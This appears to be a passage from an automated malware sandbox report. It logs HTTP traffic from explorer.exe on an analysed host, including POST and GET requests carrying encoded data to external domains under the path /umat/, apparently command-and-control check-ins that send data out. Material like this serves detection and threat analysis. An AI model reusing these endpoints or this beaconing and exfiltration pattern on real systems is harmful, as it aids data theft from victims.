                                                                                                          Data Ascii: bT7tPLpx=pgf8CKevq93b70MTgF7HLslRaJ(5~vv4fpc1oIn0mmgCiR9h7l2nRwrSSBvpzsVGtDRdTvGyIZeNNnWYjvn64fTQUFOBWji5rXz4REhSTOaqDLfi~Hk7IT8S5fD2nzIEKyBY0wRs~dRCDeysEUszuCGhMClC84n2W6BX5z6uCO0amntw4Bn9NVuvKfCpnA4xs2(5oT8c8gIVLxtu6maJlWj7sMnvMWqvn1CG4Cyg7tciB-C5bEVFYyNej6A-IfI76CVe0t7vfL(69wI5R4iu1pBeTB4mtc4usHA-yJQwAKymKxXMxVW3hrqeqZW9z_lb5SP7huGD1_FSXS8he5NrcbdYfLyTVTSIA3PcK6kSK_XDEJcxWenqJP(7ZwtFNlv74HhzclTCkNuzHStAtD9a7uwNlZguepTZgT1ZuhC_bTT5W3T2D_xJKYFc02C3ZFlhz50Uy-ebOyOUo0FtykUROfjfLs8sp-OM3Fl5nt5S7GAzE-dATNwLPLVLCJfmV9RH52~o9UDYKScL8jUXJixKmlB-4_(T9TbXpwiVb1oASKSMcqodoE9Lb07vhtyiUhtZLxhItbcKrfZxJQTZ9kAoinvwmzLKsvVxZYgMs6ViRTUH6vnJbbDoSTNBSkb3rye4VAP8PFVOSnE6EPeP~Dsy9Gl9bM1swFkF~_tg9YEaykFdCXeBM0UeJqfPexOELUaS3i(0v6EARXzALngVEpV5a538KGv0rwZe4O3y5Z8rN3KYwKCRV9~Sjq9_IrlGyU9_XkIwDJvCB6IG1nSfd5X7PFYI5pw4tBKv5rO5S8MF6pWkHPhh8p7Udkat~4WD3Q2wg0z95Y~KQIi-5Bne8RBnPiAMHbENqfaBYN7SldQrEMAnOQsDAuWc8roWHNBF5w~fyQ7f4oOq3CnNvZwHlDaNew81Q5UlkXi1ITAGfqc2HqSG4WgoGE8eonwHFoE1wHYKoGNg7BXuu3JgOGOgHIZeEWCt~OXR~C39GSh_vp8wq0O4ohmZrI(HvXO4J7BFz900bgWMs5SbrbFPpIJyBS9bmOtUNjqOMNriDbd_8ro-JvruKyfnWx93Wesd7JQovZVvjKB9LDScsDmm~djpwOxBXfaJvV9Uq5lzEf8sUqKMTULlkFEMqjY2b4y-(hPVHY1dedztGqGpzR15wuGoWYORLE7RJNzejUBaunJflVZJx44uXcUzQyEkBUCRqUhFEKD2F0RuM-vL3vQ9YyJTxOifUf7Ou50WQ9h9(VLgIhQ6bFkI6Ul27os6NbZW~SSf6HESdFvWeGBWwRoLbhETZ0tTuiG2NrCx3yW0BYB325HZDTj-X8ZN4pZ-s9uZg4SepqqxRjxSkF9qcGCk6xpD8_9Uk_mS~eLEJkgN3DpH2LEIWl5EZpsTjMfReiCBqUU3OC5Ow2Pt(vE7s_R6(0npv5nNWqv4cXxzvqBMZwasP2IBta1wIoaGjwGoQqosb7ZkUEYnycnDXHwlkxfu6QkI8f~Bo4S8igrjHBfDFTVneaiQ4jwZBTChxttnqnqEcUCCHBPQ1diEEq1MeI91PsiuJ0KW6fSPiJeEeXdtpjqcjAeNAMj7Scj1n7vcopZcwt3a1NflNqaIZ-vSXy~XMXycGs018ZYyuOGVg-4O~UKsZJhRrQGDhUCZFT7-Mw(N3w(Hzi4TaAwfffG6207KJggaBDxeEaVePP(aeMxW5NfXKtvvn-73L50y(R3HM2LxsPPhcJoYdUjHZveCPao9pziX9mS3Ub94xAf2b7ou1MhZQRxj~rPRQvM696ZZl8hFQWGI3sCEgWIj2yoKF68OXjTBEO0uwoS0~O(tT-jYeKgSyI2X1qTegk(9iVdJOx3EYfTVIeqe7qk85YVY2ymp(1(0o9NYRiqWJpwEA9XGTmM_G6RcWcnjldWB1O(DFKaBgdcVWlpWbOkSMOI6mH9NNJACIxaelosJ(ZT7O4UQqzkw9WewxHxUbxsCClAW6yVTkm4CktZuSJHgLKnEILJCjeoVUjMpvI0SUzEn~0mwoNJs5it56anpsC7-dWCrMi6NWap0D2vsWReD8rPibjOLkrkA521FdnQfFszlVqlIzyyhAABW0X3EQl~RSzjWEeUOCnBgj8Ku~XhbbZzhxF8hgtfNShwe~62acc35nZhkcc2wpiCoB6KBTdZJ(_iLet41iLWsCYBE7Rbn2ZLG2ESTfiAMKN7VyEeYLQV3zUWBiI3foZfwew05lR42K0U5VE4pdM1L6IGnxzHLG9hyqxcXP2jFLdrockD3HEu1x48OySd_tPWDPOy9dGaIS38sipF9Eqx9kunHFi2f5o1PuL8FEOTrMp2VEV6cufEgd58ymuoQn6G_pdjrvTMtNy9EGUcg6jNhUgXA9159yGhwkwDcI_Kcjeb0j08CnSwOh7zk3k(b24(QTcp2HuOYwSxOhvoUk5SZc0gi0MwiFDoj5zEDfGMeFS01h6XGV_9614TWT4lg2MKrvFJmDHGP2PBBJT0s~53-pKVVZN8LNGV1VY0zatDxT-06dlnKW41uMAxkO8BziSuIgA71aYWs6QjA~fsAsCy2H-S8nOQj~KTfz3rLBOB9Acu9(b(mU8EvZ-FCN8BsyGNJWbJ3Gbd2GgDLckJ1nQxkrIfe1TGeMvoM9E1qAY5CaFIjB6iJj3DjlY~-EF2-cf4EPD(S1fL8nBet3ctUdgMO1oKXmPVA5XzX9YkD6dsK~X4jyad_TxZoULj6hU0AId4DTnAFbvbFG-xYJNT0KTmo27(5YzJzsRhfx1I2gVdUTfr_DQjFdEOV5lnDMZRodwZHRsbu8U0p8C7w0wSntqkwMe0bDJJ8R3gj9c(Yu7tu1Q8uq3d79ieFtprb0B02xJBuRAm2(ieWG8CjA6dac97TTeMDLN3sgeL6brUChkXKCzXDj8EcsYzg5uHkIa(oUQ~x10ttMtu3gvaRxGW2zgSpV4gb9c53750Jfw1tqEeQyFepIKRybXZMs7lX0rMQFcQBbpED~fMrsq9bUpoFJUH0bgP-yXCUEd23ny8HH0pazYzfUoRV(I6tk90UdElhjcN7fmHrbwsqwgryLWb9~k1ooLCjOw(VjRU7IsQeW3vYAOiRUkCCPYgmrbsXIX90Seh7ibJB~iwN3U4y8C42ies-uMATJuFs(aV0AMsER_pMslstTrsx55iWVgyshHmUjQYfLB(wLY1Ld7Iil7lNEhf1CNSTXRzja-vB5INJadbGeEEYfyNpM0(TxmNA0umF0GidkqiTX4SnAjxZjqzUnC7yVvzcw4S1Cc8jeaxJhuRLX8kio_57uP0Kg6xfQUhGAEkjdF2hWOPNyTW1lG4uriBGRCNoCLdF(EAIXOG1WstQPmdFcRiz3CF3bLHnw_FR8TsdeSkzO5IaT_l4pKFl4Zc3nc09g2WVa6ULu571TW8VMM96IEZ3QV5Gwrt4vBb-FIIG4kPGHP(7~EtvAFd9nMFTdCo8BqdKCa9ES-vWESRXTozJXSGZvA5KMUq-bcx61IzuqVda~dKFYCLT1zgWZMVpTv4zZPsi0XhRy8rLfI1nEPeld-Kk4p(QfcIaVxy-TpJ9wOfQe0jKNvXp1koBGkYEsJLoOTbDc0Qxk_ylIMKmidoCnwzsJkw1HolFBF5bW3EWiD1c~3zJvRQA3by8qcLPwDp9bkmB6iYSSpFmfKdCEc71mkEWdhwBim9e0dy9h3NYOcSNyt5GNf0erJJoXq~jJ0lT3o0pwREVABs5FCNBwkM1X_FCnyNJPpct5I9s89DyxFLlaqq80VrQs7MgbIL-lCBbt6Ra0SK8G0hnja0BndqcOD5PlOw8J-qC30Bd(Yp3HAmENtS9PxGnH28Ikci37TJIs-Y1CdcGV55OBhYWwH6uee5KtOT_QyluFkbFKJkjoiAu0hR74ngFLXSIX5PeJ3dvKHp95Mx7~Ez_aMEhaBbiQwc2j1uo6iLGTNncaBOdVQb_DHCRUTJ_jExKm9bGV9tDqpH4IWx9F7ubbQoWceDJII1lYPzMFwqn4PgVORHhHqZDf2YKSmE1x3k3KiigqabgyrCXyu2aZYntR2aNyweCowwAC-8oqKQooY(zHYowhX6b6
                                                                                                          Jun 3, 2022 08:17:26.940789938 CEST9598OUTData Raw: 72 53 5a 4b 78 51 46 69 72 48 66 64 71 36 33 6e 6c 71 33 32 68 66 4b 75 70 41 48 30 72 44 4c 76 78 52 4c 58 37 67 45 77 74 74 62 67 4d 45 69 6d 74 48 58 6b 35 61 78 34 76 7a 65 53 43 5a 63 38 71 69 4c 70 56 68 6c 6d 51 42 63 49 59 48 64 28 53 33
                                                                                                          Data Ascii: rSZKxQFirHfdq63nlq32hfKupAH0rDLvxRLX7gEwttbgMEimtHXk5ax4vzeSCZc8qiLpVhlmQBcIYHd(S3TL-khcKpenicGFT2ivjR-DPZcZC~WNx(EpM77066BrcXZ21dnvPeptdwp(2zMIkZ3R9y9KCSLxF80azANiYA_BwzjukLQeKcF8rySCIGkbIODHgpevpYYKDHa(kD_ktNKZAogk4mVx0NAPvRDe4MJ6gdmI5adSwvv
                                                                                                          Jun 3, 2022 08:17:26.940833092 CEST9600OUTData Raw: 47 53 4d 31 78 43 66 7a 62 6a 5a 65 58 32 41 42 5a 36 77 33 55 38 51 69 36 78 6e 51 4c 51 52 6f 6a 35 35 31 43 66 71 78 56 31 48 6e 34 51 38 41 35 79 6a 67 45 49 6c 72 78 7a 45 61 4f 71 64 56 44 62 7a 62 54 67 54 48 52 28 33 57 4d 4f 34 77 6c 72
                                                                                                          Data Ascii: GSM1xCfzbjZeX2ABZ6w3U8Qi6xnQLQRoj551CfqxV1Hn4Q8A5yjgEIlrxzEaOqdVDbzbTgTHR(3WMO4wlr4Vdkjn7~t~jj7lKdJGguPm0YXh5NMnsee620VZxJQc1S2hWFJsvKgcsUSkeYIkmbRaXc4wcyk2k4AyHuYq1sCw-4stm0viSdceLpjmcJVFui3RYdJJHD_hrTEkn(aUkEMpsGBVZqMzgCEgVSpUc6Itsqn53fBuj2l
                                                                                                          Jun 3, 2022 08:17:26.940846920 CEST9603OUTData Raw: 78 79 69 34 35 78 54 44 58 61 33 56 45 68 71 73 65 55 6d 38 34 79 76 4f 5a 76 4a 6e 68 34 72 57 38 58 41 39 74 6f 34 54 55 66 44 62 45 6b 64 75 67 35 48 64 4f 69 6f 64 58 55 6a 69 31 34 50 69 7a 56 51 33 49 58 6b 4e 4e 4b 7a 61 32 7a 50 31 6e 4e
                                                                                                          Data Ascii: xyi45xTDXa3VEhqseUm84yvOZvJnh4rW8XA9to4TUfDbEkdug5HdOiodXUji14PizVQ3IXkNNKza2zP1nN5kNEazqnclmjy7_MbuZtYFGNLgtOZ5SBpS12AiIypGakWLbfcESoPJDKmdvSZmgdDvdDNMa6uYf93sbiFFqwq0arl1aYATDmt7UhPWwQJ7B15WWw_mnQUXu0hn0XgjHU4JKjafb~wpe2wtgudSl7DuDMZxRbPXFDC
                                                                                                          Jun 3, 2022 08:17:26.940865040 CEST9606OUTData Raw: 6c 62 58 75 4d 5a 73 53 46 4d 75 66 6b 74 6b 6e 6a 6a 54 77 32 36 65 59 58 48 51 57 50 72 41 6c 70 74 37 36 30 52 6c 34 62 70 5f 34 6d 30 45 30 32 59 4e 6b 39 44 47 32 71 44 31 67 49 77 71 55 57 35 74 43 48 63 55 42 58 4f 62 6a 4d 35 70 67 47 28
                                                                                                          Data Ascii: lbXuMZsSFMufktknjjTw26eYXHQWPrAlpt760Rl4bp_4m0E02YNk9DG2qD1gIwqUW5tCHcUBXObjM5pgG(htBLhMji6DOddUJz3sLbVUEZEpAGlYWskYmor9IlrHqQsYa3-qWUWG9GhBclGOjwg9Fwe8rMkpXD741TvH7LNsDM0KBcL1QLiPWf3zlLtmbNXmqkrgRdTxN95OMjBKncb6Qyeg_Ul2n(Rtih5R8fLL-Vdh88S3wCl
                                                                                                          Jun 3, 2022 08:17:26.940876961 CEST9608OUTData Raw: 79 66 53 64 6c 42 36 31 63 6d 63 44 64 35 78 68 59 36 6e 74 59 49 74 4d 33 46 37 54 71 34 79 4b 4d 31 6a 4e 6b 4f 66 33 2d 61 65 41 4b 79 72 74 62 57 44 57 4a 57 6b 75 46 74 62 42 46 5a 56 67 30 57 4e 28 77 35 62 49 32 33 4c 76 35 50 45 65 52 45
                                                                                                          Data Ascii: yfSdlB61cmcDd5xhY6ntYItM3F7Tq4yKM1jNkOf3-aeAKyrtbWDWJWkuFtbBFZVg0WN(w5bI23Lv5PEeRE96PH-3_IS1nSMrPJD7fr3YEU9e_mjxEDmGA4WPGz7gOPIJdAsHVoY6f5a~Oy0JMcJMi0XDXIuO9MxYIEWYdioPmEsYAdArj89Q-L_8c3fAze0fd52hz6aQcZSKDtCyjqs4jTFbEU9W2UNWTJ5VqWJ6CTcb5VJV2Yj
                                                                                                          Jun 3, 2022 08:17:26.940891027 CEST9614OUTData Raw: 41 75 73 32 46 52 6d 6a 52 56 30 38 67 63 56 7a 78 70 76 47 50 62 44 41 6b 7e 6d 58 52 4a 69 68 54 56 5a 49 76 4b 4a 64 43 4d 61 32 6e 79 71 74 49 59 38 54 74 5a 75 76 4e 28 57 6c 4e 70 62 4f 62 53 51 44 69 67 45 76 66 4e 48 31 38 6e 69 62 55 67
                                                                                                          Data Ascii: Aus2FRmjRV08gcVzxpvGPbDAk~mXRJihTVZIvKJdCMa2nyqtIY8TtZuvN(WlNpbObSQDigEvfNH18nibUgGlNij2dYLCPkIdAAajnzuCCSNN1BYk3zsKqDvqUyWygyHsUy0(JwljciQCqSenMmPIOyloVwljlPQTiFnEru3CswwHBBvKbRgIQpnvwqIH4mP51(9trnoTvHQlgR7r6CRaf6Z9Hjugb1Sg7C_V5jpWOapl7x_aM71
                                                                                                          Jun 3, 2022 08:17:26.940902948 CEST9616OUTData Raw: 78 75 55 59 49 32 33 62 72 77 57 5a 63 67 31 52 41 58 44 32 49 32 59 39 6c 71 37 46 51 7a 30 28 64 5a 50 36 39 76 72 70 58 52 6e 5a 30 41 76 51 69 77 48 52 56 6a 43 53 6c 62 61 74 48 65 59 70 49 33 65 74 6a 7a 71 38 64 33 61 44 35 6f 4f 4d 69 77
                                                                                                          Data Ascii: xuUYI23brwWZcg1RAXD2I2Y9lq7FQz0(dZP69vrpXRnZ0AvQiwHRVjCSlbatHeYpI3etjzq8d3aD5oOMiwnQwK1024pTwva~AyX1GqWYvGYBXhV8lqeVPDr4qCrUZw-WeMswY1RBB1tbnuTnKwFL89AQGdV0QIY6m73eqc1nLmtVTMJKpjgQ8dVoslj55gmE7jcGOOOIOh7(Q0jNohg84yFd1(8kNX86pd3q1ExJNa6a3myoPNM
                                                                                                          Jun 3, 2022 08:17:26.941128969 CEST9616INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 03 Jun 2022 06:17:26 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          D-Geo: EU
                                                                                                          Content-Encoding: gzip
                                                                                                          Data Raw: 38 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e 41 0a 02 31 0c 45 af 92 13 58 66 1f 72 04 71 eb b2 63 c3 b4 50 9b 92 a4 8a b7 b7 58 c6 ed e7 bf ff 3e 66 7f 56 c2 cc 31 11 7a f1 ca 74 15 07 1b bd 8b 3a 27 0c 2b c4 b0 2a bb a4 0f e1 83 9b b3 4e 6c a3 bb 0c 85 5d e5 6d ac f0 62 b5 22 0d 8a 41 13 a8 d2 8e 19 fe b7 2e 70 ab 1c 8d 61 f4 43 63 62 70 01 cf 0c 35 3a 9b 9f f0 34 6d 84 e1 54 84 65 0c bf 9f 5f bc 2a 38 15 ae 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 8a=A1EXfrqcPX>fV1zt:'+*Nl]mb"A.paCcbp5:4mTe_*80


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          4192.168.2.44978618.193.36.15380C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:17:26.941837072 CEST9617OUTGET /umat/?bT7tPLpx=mirGcuiLmtPKrDRAwzy9R4FSSMfuwOXiEO9Msa/shEoIjA842HTgawjSFBDstolWxD5R&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.drivetrianrepair.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 3, 2022 08:17:26.960726976 CEST9618INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 03 Jun 2022 06:17:26 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 174
                                                                                                          Connection: close
                                                                                                          D-Geo: EU
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 76 65 72 73 69 6f 6e 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 73 75 70 70 6f 72 74 65 64 2e 20 50 6c 65 61 73 65 20 75 70 67 72 61 64 65 20 74 6f 20 74 68 65 20 6c 61 74 65 73 74 20 76 65 72 73 69 6f 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                          Data Ascii: <html><head><title>Not supported</title></head><body><center><h1>Your browser version is no longer supported. Please upgrade to the latest version</h1></center></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          5192.168.2.44978966.96.162.13080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:17:37.238796949 CEST9667OUTPOST /umat/ HTTP/1.1
                                                                                                          Host: www.408wmountain.info
                                                                                                          Connection: close
                                                                                                          Content-Length: 414
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.408wmountain.info
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.408wmountain.info/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Data Raw: 62 54 37 74 50 4c 70 78 3d 78 69 4b 35 76 36 74 58 55 44 75 69 56 74 48 44 33 4c 6e 42 63 4e 50 54 42 6f 44 36 28 5a 32 75 33 37 28 47 61 30 39 54 64 73 38 33 72 47 36 71 31 69 66 31 35 77 50 4d 32 78 53 43 30 42 61 42 28 76 6f 47 64 5f 45 65 4f 6c 4f 71 73 6d 6e 4a 32 2d 52 4d 61 33 52 62 37 39 63 33 39 31 47 5a 4e 70 36 41 64 5a 78 44 39 69 6a 38 4e 48 37 4b 79 5f 47 63 54 4b 69 38 67 4f 4f 43 65 31 54 61 35 46 71 50 77 71 38 4d 73 49 32 57 67 38 4e 42 4a 36 72 66 48 44 43 58 6b 75 4a 32 32 4d 4f 46 7a 4d 44 47 67 35 77 6a 4f 68 4d 4e 48 6b 38 69 42 4e 55 56 7e 46 4a 61 46 4d 52 62 74 62 67 54 48 43 7e 42 69 37 52 72 6e 6f 41 70 37 4f 71 56 6c 6d 45 52 7a 41 43 48 4e 57 43 6e 79 6b 39 6e 78 51 57 37 6f 58 77 6b 4c 34 6d 32 78 37 4b 4c 64 6b 65 4a 75 39 57 42 51 62 67 52 4b 43 72 58 48 75 4d 52 57 59 47 39 53 6f 59 52 43 43 6f 61 4c 76 35 4a 55 73 59 42 30 45 54 76 49 41 32 69 45 6b 74 4b 44 69 6c 74 4c 69 4a 4b 67 45 49 4e 46 2d 73 58 63 54 32 66 78 51 37 69 32 48 6d 4e 58 6e 42 57 7e 51 7a 57 5a 66 77 62 44 64 32 6d 7a 42 38 33 61 56 57 30 62 66 78 76 44 48 78 30 77 38 41 2d 6e 32 47 66 77 4d 50 76 5a 49 37 59 67 77 48 4a 41 54 39 49 48 4a 39 4d 53 6f 4c 2d 78 57 7e 70 57 4d 53 7a 72 57 46 47 50 75 36 34 53 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: bT7tPLpx=xiK5v6tXUDuiVtHD3LnBcNPTBoD6(Z2u37(Ga09Tds83rG6q1if15wPM2xSC0BaB(voGd_EeOlOqsmnJ2-RMa3Rb79c391GZNp6AdZxD9ij8NH7Ky_GcTKi8gOOCe1Ta5FqPwq8MsI2Wg8NBJ6rfHDCXkuJ22MOFzMDGg5wjOhMNHk8iBNUV~FJaFMRbtbgTHC~Bi7RrnoAp7OqVlmERzACHNWCnyk9nxQW7oXwkL4m2x7KLdkeJu9WBQbgRKCrXHuMRWYG9SoYRCCoaLv5JUsYB0ETvIA2iEktKDiltLiJKgEINF-sXcT2fxQ7i2HmNXnBW~QzWZfwbDd2mzB83aVW0bfxvDHx0w8A-n2GfwMPvZI7YgwHJAT9IHJ9MSoL-xW~pWMSzrWFGPu64Sw).
                                                                                                          Jun 3, 2022 08:17:37.378067970 CEST9718INHTTP/1.1 404 Not Found
                                                                                                          Date: Fri, 03 Jun 2022 06:17:37 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 867
                                                                                                          Connection: close
                                                                                                          Server: Apache/2
                                                                                                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Age: 0
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          6192.168.2.44979066.96.162.13080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:17:37.338881969 CEST9717OUTPOST /umat/ HTTP/1.1
                                                                                                          Host: www.408wmountain.info
                                                                                                          Connection: close
                                                                                                          Content-Length: 36482
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.408wmountain.info
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.408wmountain.info/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Data Raw: 62 54 37 74 50 4c 70 78 3d 78 69 4b 35 76 2d 73 4f 66 6a 7a 79 57 39 4c 67 35 64 6a 76 46 74 28 56 48 59 47 36 31 35 61 59 7a 4a 48 34 48 6c 4e 48 63 74 45 39 76 32 6d 4c 6d 77 76 54 35 78 7e 6f 73 53 32 47 7e 42 65 41 28 76 77 6b 64 5f 49 65 50 68 7a 76 73 46 65 63 32 59 4e 50 57 33 52 6a 36 39 63 2d 73 41 6e 4c 4e 70 76 76 64 5a 35 54 38 52 48 38 50 68 28 4b 6c 75 47 58 63 4b 6a 33 73 71 54 64 42 6c 66 39 35 46 43 74 77 6f 6f 4d 73 34 79 57 6d 64 64 43 4c 35 7a 59 4b 7a 43 57 68 75 4a 6a 74 64 79 37 7a 4d 48 65 67 39 77 6a 50 54 34 4e 47 33 30 69 57 4f 73 55 32 56 4a 43 42 4d 52 63 38 4c 73 43 48 43 69 4e 69 36 6b 65 6d 61 63 70 70 4f 71 51 7a 58 41 6a 28 33 75 51 4c 58 6d 2d 79 6b 35 4f 78 6b 50 6d 6f 57 64 48 44 75 69 4e 7e 2d 6d 6c 64 69 76 53 6f 64 57 46 49 72 67 77 4b 43 72 33 48 75 4d 5f 57 59 32 39 53 75 59 52 44 68 67 61 4f 50 35 4b 61 38 59 62 7a 45 53 39 4d 41 79 59 45 67 41 45 44 6a 64 58 4d 58 4a 4b 69 56 59 4e 51 4e 55 51 46 44 32 64 6e 67 37 39 39 6e 6d 4f 58 6e 42 67 7e 52 79 4c 61 73 45 62 41 73 32 6d 7e 43 45 33 57 46 57 30 55 5f 78 70 59 33 73 78 77 38 34 36 6e 33 33 69 78 2d 6a 76 5a 64 76 59 67 52 48 4a 44 6a 39 49 4c 70 38 65 56 34 32 4b 28 58 6a 49 65 4d 65 6a 6b 44 55 79 47 36 7a 44 4b 37 51 6b 49 52 59 51 48 30 67 32 50 45 4b 33 69 46 59 36 54 77 37 50 47 51 73 51 64 55 42 51 4d 50 42 54 58 74 78 62 48 61 6c 62 30 66 51 72 30 35 58 7a 55 46 56 33 33 66 32 61 72 4f 28 6d 56 65 45 58 55 54 62 43 7e 45 79 30 34 49 42 52 32 66 33 72 79 4c 54 43 4a 62 28 2d 30 4f 57 35 44 2d 58 58 35 45 58 6a 52 73 32 70 30 52 50 42 54 78 53 68 62 6b 34 53 44 45 39 5a 65 4e 45 63 75 7a 7a 46 33 78 69 49 73 6b 6d 42 4f 37 7e 59 7a 45 77 6a 35 31 75 79 77 67 5a 6f 71 58 70 63 6a 34 46 49 72 4d 66 5a 66 44 67 47 58 36 32 77 42 35 6c 64 41 42 35 58 37 7a 4a 46 56 63 53 50 4b 46 28 44 65 72 43 35 50 43 77 4e 62 51 57 79 42 51 46 45 31 77 4d 52 39 58 77 4b 4d 57 74 78 42 41 44 50 37 6d 4d 62 4d 61 77 53 28 46 56 62 68 32 57 35 61 64 71 66 53 41 66 6a 61 7a 6c 6a 6e 71 6b 54 